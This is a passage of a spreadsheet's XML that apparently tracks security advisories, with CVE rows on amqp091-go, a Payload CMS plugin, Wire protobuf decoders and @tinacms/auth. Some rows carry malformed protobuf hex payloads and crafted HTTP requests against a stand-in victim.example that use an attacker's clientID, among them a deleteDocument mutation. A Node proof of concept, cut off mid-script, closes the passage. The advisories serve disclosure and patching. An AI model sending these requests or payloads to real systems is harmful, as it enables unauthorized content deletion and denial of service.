      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77406</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="inlineStr"/>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr"/>
      <c r="K252" s="5" t="inlineStr"/>
      <c r="L252" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M252" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr"/>
      <c r="P252" s="5" t="inlineStr"/>
      <c r="Q252" s="5" t="inlineStr"/>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>CWE-195</t>
        </is>
      </c>
      <c r="S252" s="5" t="inlineStr">
        <is>
          <t>## Summary
A logic and resource exhaustion vulnerability exists in the AMQP client's Quality of Service (`Qos`) configuration method. The `Qos` function accepts signed integers (`int`) for the `prefetchCount` and `prefetchSize` parameters but casts them directly to unsigned integers (`uint16` and `uint32`, respectively) when formatting the wire-level frame.
If a developer passes a negative integer (such as `-1`) to these parameters—frequently intended as a sentinel value meaning "no change" or "no limit"—the application performs an implicit signed-to-unsigned conversion. This wraps the values to their absolute maximum limit ($65535$ and $4294967295$). Consequently, a consumer expecting restricted message delivery rates is suddenly flooded with an unlimited volume of messages, potentially exhausting memory resources and crashing the application.
---
## Vulnerability Details
### Mechanism
The bug manifests during the structural assignment inside the channel's `Qos` method:
```go
// channel.go:795-796
PrefetchCount: uint16(prefetchCount),  // -1 wraps to 65535
PrefetchSize:  uint32(prefetchSize),   // -1 wraps to 4294967295
```
In Go, converting a negative signed integer to an unsigned integer shifts the value via two's complement arithmetic. Because no boundary validation or signedness check occurs prior to the cast:
* Passing `-1` for `prefetchCount` yields a wire value of `65535`.
* Passing `-1` for `prefetchSize` yields a wire value of `4294967295`.
### Impact
The AMQP broker interprets a `prefetch-count` of `65535` as an instruction to dispatch messages to the consumer with virtually no concurrency limits. 
If the application is processing heavy payloads or relies on strict rate-limiting to maintain stability, this unexpected flood will cause rapid heap memory growth, unmanageable processing queues, and an eventual Out-Of-Memory (OOM) termination.
---
## Attack Vector
An attacker who can manipulate configuration files, environmental variables, or API inputs that dictate client Qos settings can trigger an application-layer Denial of Service:
1. **Malicious Input:** An attacker sets a service's prefetch configuration parameter to `-1`.
2. **Implicit Overflow:** The application initializes the channel, executes `Qos(-1, ...)`, and transmits an unintended maximum-capacity request to the RabbitMQ/AMQP broker.
3. **Consumer Exhaustion:** The broker flushes the entire contents of the queue directly into the client consumer's network buffer, bypassing expected application concurrency barriers and inducing a crash.</t>
        </is>
      </c>
      <c r="T252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77406</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59965</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr"/>
      <c r="K253" s="5" t="inlineStr"/>
      <c r="L253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q253" s="5" t="inlineStr"/>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S253" s="5" t="inlineStr">
        <is>
          <t>Payload Plugins is a collection of plugins designed to enhance Payload CMS. In 0.7.0, @jhb.software/payload-alt-text-plugin exposes POST /api/alt-text-plugin/generate and POST /api/alt-text-plugin/bulk with a default guard that accepts any authenticated user, while alt-text/src/endpoints/generateAltText.ts and alt-text/src/endpoints/bulkGenerateAltTexts.ts call req.payload.findByID and req.payload.update without overrideAccess: false. Payload therefore defaults overrideAccess to true and skips the target collection's read and update access functions. An authenticated low-privilege user can supply id, collection, locale, and update values to read arbitrary protected upload documents and overwrite their alt and keywords fields, even when the collection permits those operations only to administrators. A control Local API call with overrideAccess: false is denied, confirming that the plugin endpoint bypasses otherwise effective collection rules. This vulnerability is fixed in 0.8.0.</t>
        </is>
      </c>
      <c r="T253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59965</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77407</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="inlineStr"/>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr"/>
      <c r="K254" s="5" t="inlineStr"/>
      <c r="L254" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M254" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr"/>
      <c r="P254" s="5" t="inlineStr"/>
      <c r="Q254" s="5" t="inlineStr"/>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>CWE-316</t>
        </is>
      </c>
      <c r="S254" s="5" t="inlineStr">
        <is>
          <t>## Summary
An information disclosure vulnerability exists in the AMQP client implementation's authentication handling configuration. Following a successful connection handshake, the `Connection.Config.SASL` field stores the `Authentication` implementation state used to establish the session. 
For standard `PLAIN` authentication, this state utilizes the `PlainAuth` struct, which defines both `Username` and `Password` as publicly exported, plaintext string fields. Because this sensitive data is retained permanently in-memory within an exported field structure, any peripheral code, internal package, reflective logger, dependency, or automated debugging utility with access to the core `*Connection` object can read and expose the raw credentials.
---
## Vulnerability Details
### Mechanism
The vulnerability stems from the structural design of the configuration storage used during and after the AMQP handshake:
```go
// auth.go:21-23
type PlainAuth struct {
    Username string
    Password string  // exported plaintext
}
```
When an application initializes a connection, the `PlainAuth` object is deeply nested inside the configuration structure (`Connection.Config`). Even after the handshake concludes and authentication is complete, this structure persists natively in-memory for the duration of the network connection's lifecycle. 
Because `Password` is an exported string field, standard automated inspection mechanisms can read its value without restriction.
### Affected Code Paths &amp; Integrations
Any sub-component or library that traverses or reads the `*Connection` object will inadvertently read the plaintext password, including:
* **Reflective Loggers:** Structured logging frameworks that serialize nested configuration structs into JSON/Log formats.
* **APM &amp; Performance Agents:** Automated telemetry or Application Performance Monitoring tools that capture state snapshots.
* **Debugging &amp; Panic Handlers:** Mid-tier software or dump libraries designed to capture goroutine state or print deep struct hierarchies upon program errors or signals.
### Impact
The credential remains vulnerable to leak paths into logging pipelines, log aggregators, security information and event management (SIEM) systems, or standard output. Once transmitted to external log infrastructure, these credentials become accessible to unprivileged operators or any actor with access to log archives.
---
## Attack Vector
An attacker does not necessarily need direct remote code execution to exploit this flaw; instead, the vulnerability acts as a credential harvesting vector inside multi-tenant environments or via secondary log exposure:
1. **Configuration Dump:** An operator configures a standard reflective logger or third-party APM package to capture system state parameters, including the active AMQP `*Connection` object.
2. **Reflective Access:** The inspection engine uses Go's `reflect` package to walk the structural hierarchy, pulling the string value from `Connection.Config.SASL.(*PlainAuth).Password`.
3. **Exfiltration:** The plaintext password is written to standard system logs, which are then scraped into shared logging aggregators, exposing production infrastructure credentials to a wider audience.</t>
        </is>
      </c>
      <c r="T254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77407</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63126</t>
        </is>
      </c>
      <c r="D255" s="5" t="inlineStr"/>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="inlineStr"/>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr"/>
      <c r="K255" s="5" t="inlineStr"/>
      <c r="L255" s="5" t="inlineStr">
        <is>
          <t>maven:com.squareup.wire:wire-runtime</t>
        </is>
      </c>
      <c r="M255" s="5" t="inlineStr">
        <is>
          <t>6.4.5, 7.0.0-alpha04</t>
        </is>
      </c>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr"/>
      <c r="P255" s="5" t="inlineStr"/>
      <c r="Q255" s="5" t="inlineStr"/>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S255" s="5" t="inlineStr">
        <is>
          <t>Wire's protobuf decoders did not consistently validate attacker-controlled length-delimited sizes against the current reader bounds before computing cursor, limit, or pointer positions.
In the Kotlin runtime, `ProtoAdapter.decode(ByteArray)` and `ProtoAdapter.decode(ByteString)` use the `ProtoReader32` fast path implemented by `ByteArrayProtoReader32`. In `ByteArrayProtoReader32.internalNextLengthDelimited()`, Wire read an untrusted varint length into an `Int` and rejected only negative values. A length such as `2147483647` is non-negative, so it passed that check, but `pos + length` overflowed the signed 32-bit cursor and produced a negative `limit`. The following `if (limit &gt; pushedLimit)` guard did not catch this because the overflowed value was negative.
That invalid limit then reached string, bytes, skip, and scalar-reading paths as an invalid byte count or invalid range. Instead of failing as a checked decode error such as `IOException`, malformed input could throw unchecked runtime exceptions including `IllegalArgumentException` and `ArrayIndexOutOfBoundsException`. Applications commonly treat malformed protobuf input as an expected decode failure; unchecked runtime exceptions escaping that boundary can crash request handling or the process.
The original report is a sibling of the negative-length skipped-group bug fixed as CVE-2026-45799. It is not the same bug. The length in this advisory is positive, and the overflow occurs when setting a length-delimited message limit, not only when skipping a group.
While auditing for the same bug class, related boundary flaws were also found and fixed:
- Kotlin `ProtoReader` now validates logical message limits before varint, fixed32, fixed64, and skip operations. The originally reported byte-array overflow payload did not reproduce as the same signed overflow in `ProtoReader`, because that reader tracks positions as `Long`, but the streaming reader still needed consistent current-message-limit enforcement.
- Swift `ReadBuffer.readVarint()` read `pointer.pointee` before checking that one byte remained. A tag-only varint field could read past the end of the buffer.
- Swift `ReadBuffer.verifyAdditional(count:)` formed `pointer.advanced(by: count)` before proving the requested `count` fit within the remaining buffer, so pointer arithmetic ran before the bounds were established. (The distinct Swift negative-length `skipGroup()` crash is tracked separately as GHSA-86wm-r4c5-2rc9 / CVE-2026-61695; this advisory covers the positive/oversized-length boundary failures.)
- Swift nested-message decoding and packed-repeated decoding computed end pointers from untrusted lengths before validating that the bytes were present.
- Swift packed-repeated decoding reserved array capacity from an untrusted length before validating that the length existed in the current buffer.
- Swift size-delimited decoding converted an untrusted `UInt64` varint size to `Int` without exactness or availability checks. On platforms where the value is not representable, this could trap.
The fix enforces a single invariant across the hardened readers: every decoded or skipped byte count must be non-negative and no larger than the remaining bytes in the current logical message limit before any cursor, pointer, limit, allocation, or slice is advanced.
### Impact
An attacker who can supply protobuf bytes to an application using affected Wire decoders can trigger a denial of service by causing decode to fail with unchecked runtime failures or traps rather than normal malformed-input decode errors.
Known impact:
- Availability impact only.
- No known confidentiality impact.
- No known integrity impact.
- No known code execution.
Attack requirements:
- The application decodes attacker-controlled protobuf bytes with Wire.
- No authentication is required if the decoding endpoint is reachable without authentication.
- A single short malformed protobuf payload is sufficient for the Kotlin byte-array fast path.
Most directly affected Kotlin entry points:
- `ProtoAdapter.decode(ByteArray)`
- `ProtoAdapter.decode(ByteString)`
Adjacent Kotlin path hardened by this fix:
- `ProtoAdapter.decode(BufferedSource)`
- direct use of `ProtoReader`
Affected Swift entry points:
- Swift `ProtoDecoder` and `ProtoReader` APIs when decoding attacker-controlled `Data` or buffers.
### Proof of concept and regression payloads
These payloads are intentionally small and should be treated as malformed protobuf input. After the fix, they must fail with normal decode errors such as `IOException`, `EOFException`, or `ProtoDecoder.Error.unexpectedEndOfData`, not unchecked runtime exceptions, traps, out-of-bounds reads, or large allocations.
#### Kotlin byte-array known length-delimited field
Hex:
```text
0A FF FF FF FF 07
```
Meaning:
- `0A`: field 1, length-delimited
- `FF FF FF FF 07`: varint length `2147483647`
Pre-fix behavior observed through `Person.ADAPTER.decode(byteArray)`:
```text
java.lang.IllegalArgumentException: startIndex: 6 &gt; endIndex: -2147483643
```
Expected fixed behavior:
```text
IOException / EOFException
```
#### Kotlin byte-array unknown length-delimited field
Hex:
```text
1A FF FF FF FF 07
```
Meaning:
- `1A`: field 3, length-delimited
- `FF FF FF FF 07`: varint length `2147483647`
Pre-fix behavior observed:
```text
ArrayIndexOutOfBoundsException
```
Expected fixed behavior:
```text
IOException / EOFException
```
#### Kotlin byte-array skipped group containing oversized positive length
Hex:
```text
0B 0A FF FF FF FF 07 0C
```
Meaning:
- `0B`: start group, field 1
- `0A`: nested field 1, length-delimited
- `FF FF FF FF 07`: varint length `2147483647`
- `0C`: end group, field 1
Expected fixed behavior:
```text
IOException / EOFException
```
#### Kotlin current-message-limit fixed32 boundary
Hex:
```text
02 0D 05 00 00 00
```
Meaning:
- `02`: outer length-delimited message length is 2 bytes
- `0D`: nested field 1, fixed32
- `05 00 00 00`: enough bytes remain in the underlying source, but not inside the current logical message limit
Expected fixed behavior:
```text
EOFException
```
This covers the invariant that scalar reads must not cross the current length-delimited message boundary even when the underlying source has more bytes available.
#### Swift tag-only varint value
Hex:
```text
08
```
Meaning:
- `08`: field 1, varint
- Missing varint value byte
Pre-fix risk:
- `ReadBuffer.readVarint()` could dereference `pointer.pointee` before verifying that a byte remained.
Expected fixed behavior:
```text
ProtoDecoder.Error.unexpectedEndOfData
```
#### Swift nested message with oversized positive length
Hex:
```text
12 FF FF FF FF 07
```
Meaning:
- `12`: field 2, length-delimited
- `FF FF FF FF 07`: varint length `2147483647`
Pre-fix risk:
- Nested message decoding computed an end pointer from an untrusted length before proving that the buffer contained that many bytes.
Expected fixed behavior:
```text
ProtoDecoder.Error.unexpectedEndOfData
```
#### Swift packed repeated field with oversized positive length
Hex:
```text
0A FF FF FF FF 07
```
Meaning:
- `0A`: field 1, length-delimited packed repeated field
- `FF FF FF FF 07`: varint length `2147483647`
Pre-fix risk:
- Packed repeated decoding could reserve capacity based on an untrusted length before proving the bytes were present.
Expected fixed behavior:
```text
ProtoDecoder.Error.unexpectedEndOfData
```
#### Swift size-delimited stream with unrepresentable size
Hex:
```text
FF FF FF FF FF FF FF FF FF 01
```
Meaning:
- Size-delimited message length varint `UInt64.max`
Pre-fix risk:
- `ProtoDecoder.decodeSizeDelimited(_:from:)` converted the untrusted `UInt64` to `Int` without exactness checking.
Expected fixed behavior:
```text
ProtoDecoder.Error.unexpectedEndOfData
```
### Root cause
The vulnerable code mixed three operations that must remain separate:
1. Decode an untrusted protobuf length.
2. Validate that the length is non-negative and fits within the current logical message boundary.
3. Advance the cursor, pointer, limit, slice, or allocation based on that length.
In the vulnerable paths, step 3 happened before step 2 was complete. For Kotlin `ByteArrayProtoReader32`, this caused signed integer wraparound in `pos + length`. For Swift, related pointer and allocation operations could be performed before proving the requested bytes existed.
### Fix
The fix centralizes checked cursor and pointer advancement.
Kotlin changes:
- `ByteArrayProtoReader32` now validates constructor invariants for `pos` and `limit`.
- `ByteArrayProtoReader32` now uses shared helpers to:
  - reject negative lengths,
  - compute checked limits,
  - compute remaining bytes in the current logical limit,
  - validate before `skip`,
  - validate before string and bytes reads,
  - validate before fixed32 and fixed64 reads.
- `ProtoReader` now mirrors the same logical-boundary model for:
  - length-delimited limit calculation,
  - skipped length-delimited fields,
  - varint reads,
  - fixed32 reads,
  - fixed64 reads,
  - current-message remaining-byte calculations.
Swift changes:
- `ReadBuffer` now computes checked end pointers only after confirming `count &gt;= 0` and `count &lt;= remaining`.
- `ReadBuffer.readVarint()` verifies one byte remains before each byte dereference.
- `ReadBuffer.readBuffer(count:)`, `readData(count:)`, `readFixed32()`, and `readFixed64()` compute the checked new pointer before reading and advancing.
- `ProtoReader.beginMessage()` validates nested message lengths before storing a message-end pointer.
- Packed repeated decoding validates the packed field length before preallocation and before constructing the loop boundary.
- `ProtoDecoder.decodeSizeDelimited(_:from:)` converts sizes with `Int(exactly:)` and verifies that the full message bytes exist before constructing a child buffer.
Fixed in PR #3635:
- https://github.com/square/wire/pull/3635
- Fix commit `25ebcabb9ab7f12d1d77af75ecbc51726fddc015`
### Workarounds
The recommended remediation is to upgrade to a patched release.
Partial mitigations if an immediate upgrade is not possible:
- Reject or cap untrusted protobuf message sizes before passing bytes to Wire.
- Prefer decoding from a bounded source where possible rather than decoding unbounded attacker-controlled byte arrays.
- Treat unchecked runtime exceptions from protobuf decode as malformed-input failures at service trust boundaries so they cannot crash the process.
- For Swift, do not pass untrusted size-delimited streams or `Data` directly to affected decoders without an outer size cap and exception/error boundary.
These mitigations reduce exposure but do not fully fix the parser bugs.
### Detection
A crash or error may contain one of the following symptoms when processing malformed protobuf bytes:
```text
IllegalArgumentException: startIndex: 6 &gt; endIndex: -2147483643
ArrayIndexOutOfBoundsException
IndexOutOfBoundsException
unexpected unchecked RuntimeException during ProtoAdapter.decode(ByteArray)
Swift trap during Int conversion from an untrusted protobuf size
Swift unexpected pointer/buffer failure while reading malformed varints or length-delimited values
```
The absence of these exact messages does not prove safety. Any unchecked exception, trap, or process crash while decoding malformed length-delimited protobuf input should be investigated.
### Verification
Regression tests added:
- `ProtoReader32Test.lengthDelimitedRejectsPositiveLengthOverflow`
- `ProtoReader32Test.fixed32CannotReadPastLengthDelimitedLimit`
- `ProtoReaderTest.fixed32CannotReadPastLengthDelimitedLimit`
- `ProtoReaderTests.testReadVarintRejectsMissingValue`
- `ProtoReaderTests.testNestedMessageRejectsOversizedLength`
- `ProtoReaderTests.testPackedRepeatedRejectsOversizedLengthBeforePreallocation`
- `ProtoDecoderTests.testDecodeSizeDelimitedRejectsUnrepresentableSize`
Focused verification command:
```bash
./gradlew :wire-runtime:jvmTest :wire-runtime-swift:test
```
Expected result:
```text
BUILD SUCCESSFUL
```
### Relationship to related advisories
This is a distinct vulnerability from the negative-length issues. It is a
different bug class — a positive, non-negative length (for example
`2147483647`) that passes the existing `length &lt; 0` check but still overflows
the signed 32-bit cursor or crosses the current message boundary — and it has
a separate fix (PR #3635, not the negative-length PRs).
- `CVE-2026-45799` / `GHSA-7xpr-hc2w-34m9` fixed the original Kotlin/JVM
  negative-length skipped-group crash (Wire `6.3.0`). The non-negative
  overflow described here was not covered by that check and remained
  exploitable through `6.4.4`.
- `GHSA-86wm-r4c5-2rc9` / `CVE-2026-61695` covers the Swift negative-length
  `skipGroup()` crash (PR #3616). The Swift hardening in this advisory
  (PR #3635) instead addresses positive/oversized-length overflow, buffer
  over-read, and unrepresentable-size conversions in the Swift readers.</t>
        </is>
      </c>
      <c r="T255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63126</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63506</t>
        </is>
      </c>
      <c r="D256" s="5" t="inlineStr"/>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="inlineStr"/>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr"/>
      <c r="K256" s="5" t="inlineStr"/>
      <c r="L256" s="5" t="inlineStr">
        <is>
          <t>npm:@tinacms/auth, npm:next-tinacms-azure</t>
        </is>
      </c>
      <c r="M256" s="5" t="inlineStr">
        <is>
          <t>1.1.4, 15.0.1</t>
        </is>
      </c>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr"/>
      <c r="P256" s="5" t="inlineStr"/>
      <c r="Q256" s="5" t="inlineStr"/>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S256" s="5" t="inlineStr">
        <is>
          <t>## Summary
`@tinacms/auth`'s `isAuthorized(req)` decides authorization by validating the caller's bearer token against `https://identity.tinajs.io/v2/apps/${req.query.clientID}/currentUser`, where the `clientID` comes from the request and is never compared to the site's own configured TinaCloud app id. The function answers "is this token a verified user of whatever app the caller named?" instead of "is this token a verified user of THIS site?"
Any TinaCloud user can create their own free app, get a valid token for it, and send `?clientID=&lt;their-own-app&gt;` plus `Authorization: &lt;their-own-token&gt;` to a victim self-hosted site. The victim's `authorized` callback runs `const user = await isAuthorized(req); return user &amp;&amp; user.verified`, which returns `true`, and the victim authorizes the attacker.
The attacker holds no account on the victim and needs no victim interaction. With the media handlers this grants read, upload, and delete on the victim's media bucket. When the backend uses `TinaCloudBackendAuthProvider()` (the default the `tinacms init` wizard generates for TinaCloud auth), it grants full GraphQL read, write, and delete of the victim's content.
## Affected code (confirmed at `5a6839f`)
`packages/@tinacms/auth/src/index.ts:71-88` reads the `clientID` from the request:
```ts
export const isAuthorized = async (req: NextApiRequest) =&gt; {
  const clientID = req.query.clientID;     // attacker-controlled
  const token = req.headers.authorization; // attacker-controlled
  if (typeof clientID === 'string' &amp;&amp; typeof token === 'string') {
    return await isUserAuthorized({ clientID, token });
  }
  return undefined;
};
```
`index.ts:16-43` sends that caller-chosen `clientID` straight to the identity server, and returns the user on `200`:
```ts
const tinaCloudRes = await fetch(
  `https://identity.tinajs.io/v2/apps/${clientID}/currentUser`,
  { headers: new Headers({ 'Content-Type': 'application/json', authorization: token }), method: 'GET' }
);
if (tinaCloudRes.ok) { return await tinaCloudRes.json(); }
```
`index.ts:118-135` (`TinaCloudBackendAuthProvider`) gates only on `verified`, which reflects the attacker's own email verification:
```ts
isAuthorized: async (req, _res) =&gt; {
  const user = await isAuthorized(req as NextApiRequest);
  if (user &amp;&amp; user.verified) return { isAuthorized: true };
  return { isAuthorized: false, errorCode: 401, errorMessage: 'Unauthorized' };
},
```
Every media-store README wires the same gate (`next-tinacms-cloudinary/README.md:113-122`, identical in `s3` and `dos`):
```ts
authorized: async (req, _res) =&gt; {
  if (process.env.NEXT_PUBLIC_USE_LOCAL_CLIENT === '1') return true;
  const user = await isAuthorized(req);
  return user &amp;&amp; user.verified;   // no clientID === &lt;this site's app&gt; check
}
```
The bug is duplicated in `next-tinacms-azure/src/auth.ts:34-51` (`req.nextUrl.searchParams.get('clientID')`). Downstream nothing pins the site's `clientID`: `@tinacms/datalayer/src/backend/index.ts:201` gates on the boolean, and `next-tinacms-cloudinary/src/handlers.ts:36` returns 401 only when the callback is false. The `tinacms init` TinaCloud path ships this by default (`@tinacms/cli/.../prompts/authProvider.ts:17` -&gt; `TinaCloudBackendAuthProvider()`, used in `templates/tinaNextRoute.tsx:21-24` for every non-local deployment).
## Steps to reproduce (real target)
**Setup:** attacker has one free TinaCloud account with one app (`clientID = ATTACKER_APP`, token `T_attacker`) and no victim account. Victim is any self-hosted TinaCMS site using `@tinacms/auth`.
Media bucket (read; the same gate covers `POST` upload and `DELETE`):
```
GET /api/cloudinary/media?clientID=ATTACKER_APP HTTP/1.1
Host: victim.example
Authorization: T_attacker
```
Content backend, when `TinaCloudBackendAuthProvider` is used:
```
POST /api/tina/gql?clientID=ATTACKER_APP HTTP/1.1
Host: victim.example
Authorization: T_attacker
Content-Type: application/json
{"query":"mutation($c:String!,$r:String!){deleteDocument(collection:$c,relativePath:$r){__typename}}","variables":{"c":"post","r":"hello.md"}}
```
**Expected:** 401/403 for a user with no access to `victim.example`.
**Actual:** 200, because authorization is bound to the attacker-supplied `clientID`.
## Proof of concept (self-contained, zero dependencies)
Save the file below as `poc.js` and run `node poc.js` (Node &gt;= 18). It runs the package's own `isAuthorized` / `isUserAuthorized` (TypeScript types removed; the hard-coded `identity.tinajs.io` base read from an env var so it points at a local identity model) behind the verbatim media-store `authorized` callback. The identity model scopes tokens to apps correctly and is not itself vulnerable; the bug is that the victim lets the caller choose which app to validate against.
```js
/**
 * Self-contained PoC — @tinacms/auth cross-tenant authorization bypass
 * Audited commit: 5a6839f95ca60d1b9f4032a3bed1ae4a338a4787 (@tinacms/auth 1.1.3)
 *
 * Zero dependencies. Run with:  node poc.js   (Node &gt;= 18 for global fetch)
 *
 * The two functions below are copied from packages/@tinacms/auth/src/index.ts.
 * The ONLY changes are: TypeScript types removed, and the hard-coded
 * https://identity.tinajs.io base read from IDENTITY_BASE so it can point at the
 * local identity model. req.query.clientID, the currentUser call, and the
 * `user &amp;&amp; user.verified` gate are byte-for-byte the original logic.
 */
const http = require('http');
const IDENTITY_PORT = 18099;
const VICTIM_PORT = 19090;
process.env.IDENTITY_BASE = `http://127.0.0.1:${IDENTITY_PORT}`;
/* ===== verbatim from @tinacms/auth/src/index.ts (types stripped) ===== */
const isUserAuthorized = async (args) =&gt; {
  const clientID = args.clientID;
  const token = args.token;
  try {
    const tinaCloudRes = await fetch(
      `${process.env.IDENTITY_BASE || 'https://identity.tinajs.io'}/v2/apps/${clientID}/currentUser`,
      {
        headers: new Headers({ 'Content-Type': 'application/json', authorization: token }),
        method: 'GET',
      }
    );
    if (tinaCloudRes.ok) {
      const user = await tinaCloudRes.json();
      return user;
    }
    return;
  } catch (e) {
    console.error(e);
    throw e;
  }
};
const isAuthorized = async (req) =&gt; {
  const clientID = req.query.clientID;       // &lt;-- attacker-controlled
  const token = req.headers.authorization;   // &lt;-- attacker-controlled
  if (typeof clientID === 'string' &amp;&amp; typeof token === 'string') {
    return await isUserAuthorized({ clientID, token });
  }
  return undefined;
};
/* ===== identity model: a token grants access to the app its owner owns =====
   This is NOT the vulnerable part. It scopes tokens to apps correctly. The bug
   is that the victim lets the caller choose which app to validate against.     */
const TOKEN_FOR = {
  'victim-app': 'valid-token-for-victim-app',
  'attacker-app': 'valid-token-for-attacker-app',
};
const USER_FOR = {
  'victim-app': { id: 'u-victim', email: 'owner@victim.example', verified: true, role: 'admin' },
  'attacker-app': { id: 'u-attacker', email: 'attacker@evil.example', verified: true, role: 'admin' },
};
const identity = http.createServer((req, res) =&gt; {
  const m = req.url.match(/^\/v2\/apps\/([^/]+)\/currentUser$/);
  if (!m) { res.writeHead(404); return res.end('nf'); }
  const app = decodeURIComponent(m[1]);
  if (TOKEN_FOR[app] &amp;&amp; req.headers['authorization'] === TOKEN_FOR[app]) {
    res.writeHead(200, { 'Content-Type': 'application/json' });
    return res.end(JSON.stringify(USER_FOR[app]));
  }
  res.writeHead(401, { 'Content-Type': 'application/json' });
  return res.end(JSON.stringify({ message: 'unauthorized for this app' }));
});
/* ===== victim site (own clientID = victim-app), verbatim media-store README callback ===== */
const authorized = async (req) =&gt; {
  const user = await isAuthorized(req);
  return user &amp;&amp; user.verified;             // never checks req.query.clientID === victim-app
};
const victim = http.createServer(async (req, res) =&gt; {
  const u = new URL(req.url, `http://127.0.0.1:${VICTIM_PORT}`);
  req.query = Object.fromEntries(u.searchParams.entries());
  if (!u.pathname.startsWith('/api/cloudinary/media')) { res.writeHead(404); return res.end('nf'); }
  if (!(await authorized(req))) {
    res.writeHead(401, { 'Content-Type': 'application/json' });
    return res.end(JSON.stringify({ message: 'sorry this user is unauthorized' }));
  }
  res.writeHead(200, { 'Content-Type': 'application/json' });
  return res.end(JSON.stringify({ authorized: true, site: 'victim-app',
